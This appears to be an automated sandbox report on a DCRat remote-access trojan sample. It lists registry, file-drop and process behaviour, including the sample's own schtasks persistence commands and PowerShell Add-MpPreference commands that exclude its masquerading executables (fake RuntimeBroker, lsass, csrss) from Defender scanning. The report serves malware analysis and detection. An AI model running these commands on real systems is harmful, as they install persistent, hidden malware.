| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\sk-SK\RCXA564.tmp | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File opened for modification | C:\Windows\System32\sk-SK\RCXA565.tmp | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File opened for modification | C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File created | C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File created | C:\Windows\System32\sk-SK\55b276f4edf653 | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Speech\Engines\Lexicon\9e8d7a4ca61bd9 | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File opened for modification | C:\Windows\Speech\Engines\Lexicon\RCXAEE2.tmp | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File opened for modification | C:\Windows\Speech\Engines\Lexicon\RCXAEE3.tmp | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File opened for modification | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File created | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe
"C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Default User\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf1" /sc MINUTE /mo 5 /tr "'C:\Program Files\edge_BITS_4680_1850129863\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf" /sc ONLOGON /tr "'C:\Program Files\edge_BITS_4680_1850129863\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf1" /sc MINUTE /mo 8 /tr "'C:\Program Files\edge_BITS_4680_1850129863\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\d25f591a00514bc9ba8441\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\d25f591a00514bc9ba8441\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\d25f591a00514bc9ba8441\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Pictures\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Pictures\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\edge_BITS_4732_595216890\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\edge_BITS_4732_595216890\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files\edge_BITS_4732_595216890\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\7e20f84d5244aba7145631d4073af8\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\7e20f84d5244aba7145631d4073af8\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\7e20f84d5244aba7145631d4073af8\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\7e20f84d5244aba7145631d4073af8\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\7e20f84d5244aba7145631d4073af8\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\7e20f84d5244aba7145631d4073af8\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\Sun\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\Sun\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Roaming\Sun\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files\edge_BITS_4732_595216890\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\edge_BITS_4732_595216890\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\edge_BITS_4732_595216890\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\d25f591a00514bc9ba8441\sihost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\d25f591a00514bc9ba8441\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\d25f591a00514bc9ba8441\sihost.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\edge_BITS_4680_1850129863\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\d25f591a00514bc9ba8441\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\Idle.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\edge_BITS_4732_595216890\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\7e20f84d5244aba7145631d4073af8\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\7e20f84d5244aba7145631d4073af8\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Sun\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\edge_BITS_4732_595216890\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\d25f591a00514bc9ba8441\sihost.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XeGdH0U8sJ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
"C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c0c5fc13-d501-4833-9b9b-2f080c1c8aaa.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5a79a36d-291c-4c41-a4e1-ce73bfd5be23.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\239e4973-5b62-442b-9de7-006ed6a8a33a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29977282-8079-4515-abe5-95d953d4d2e7.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\86e9093d-cfd8-4f3c-89b1-c4cc91329d80.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5a0d340d-5da3-465a-b7c6-c63eca7fb974.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3ba6a0cf-f68f-41a4-9e7a-e7243952869a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7c72cc37-3e9c-428a-9a57-6cf126c94b89.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3ec648c8-1a84-4dd5-ad79-9f0512d16478.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\51408b74-5209-4e9d-b34f-994d528be8c5.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a4c3d2b5-daef-4164-abe0-b84a7d8560d3.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02724ef0-5704-4728-b259-f0ec34b3f4cb.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\821b7e38-7e51-4bcc-a17e-12564ee68448.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6cf45963-e3ec-464e-b072-bde9404bf4cd.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aba768da-aa2e-42b0-ba71-4d52689d6e04.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6a40fb0b-9503-440c-b053-ed4004efd2ff.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\358be680-2edf-4b05-9c24-bcc49573f997.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9d6ae010-d3de-4322-b7bf-6677de9dfa0a.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6333a880-14b3-4f87-8e0c-51f77801efe1.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9df513f0-9eab-4cfb-928d-280ba06f91cb.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bf4002af-6d93-4c21-97ce-fba11d964f3b.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\023f77f7-844f-45b0-905c-a371be847a67.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
